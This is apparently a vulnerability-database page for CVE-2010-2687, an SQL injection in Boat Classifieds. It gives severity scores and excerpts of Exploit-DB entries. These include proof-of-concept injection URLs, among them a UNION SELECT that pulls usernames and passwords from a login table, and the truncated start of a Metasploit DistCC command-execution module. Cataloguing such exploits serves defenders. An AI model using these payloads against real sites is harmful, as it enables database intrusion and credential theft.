CVE-2010-2687
published 2010-07-12CVE-2010-2687: SQL injection vulnerability in printdetail.asp in Site2Nite Boat Classifieds allows remote attackers to execute arbitrary SQL commands via the Id parameter.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.16%
63.2th percentile
SQL injection vulnerability in printdetail.asp in Site2Nite Boat Classifieds allows remote attackers to execute arbitrary SQL commands via the Id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Boat Classifieds - 'printdetail.asp?Id' SQL Injection
exploitdb·2010-06-23
CVE-2010-2687 Boat Classifieds - 'printdetail.asp?Id' SQL Injection
Boat Classifieds - 'printdetail.asp?Id' SQL Injection
---
##################################################################################################
Boat Classifieds SQL Injection Vulnerability (printdetail.asp?Id)
##################################################################################################
Author : CoBRa_21
Script Home : http://www.site2nite.com/boat-webdesign.asp
Dork : null
##################################################################################################
Sql Injection:
http://localhost/[path]/printdetail.asp?Id=661 and 1=1
http://localhost/[path]/printdetail.asp?Id=661 and 1=2
##################################################################################################
Yeni Windows 7: Size en uygun bilgisayar? bulun. Daha f
Exploit-DB
Boat Classifieds - SQL Injection
exploitdb·2010-06-22
CVE-2010-2688 Boat Classifieds - SQL Injection
Boat Classifieds - SQL Injection
---
Boat Classifieds
####################################################
# Category: Boat Classifieds SQL Injection Vulnerability
# Download: http://www.site2nite.com/boat-webdesign.asp
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group.net
####################################################
Exploit:
http://server/detail.asp?ID=999999 union select
1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
from tbllogin " having 1=1--
sangteamtham [at] hcegroup.net
Discovered on Fri, Jul 17, 2009
Exploit-DB
DistCC Daemon - Command Execution (Metasploit)
exploitdb·2002-02-01
CVE-2004-2687 DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit)
---
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],
[ 'OSVDB', '13378' ],
[ 'URL', 'http://distcc.samba.org/security.html'],
],
'Platform' => ['u
No writeups or analysis indexed.
http://packetstormsecurity.org/1006-exploits/boatclassifieds-sql.txthttp://secunia.com/advisories/40263http://www.exploit-db.com/exploits/13995http://www.osvdb.org/65685http://www.securityfocus.com/bid/41059https://exchange.xforce.ibmcloud.com/vulnerabilities/59671http://packetstormsecurity.org/1006-exploits/boatclassifieds-sql.txthttp://secunia.com/advisories/40263http://www.exploit-db.com/exploits/13995http://www.osvdb.org/65685http://www.securityfocus.com/bid/41059https://exchange.xforce.ibmcloud.com/vulnerabilities/59671
2010-07-12
Published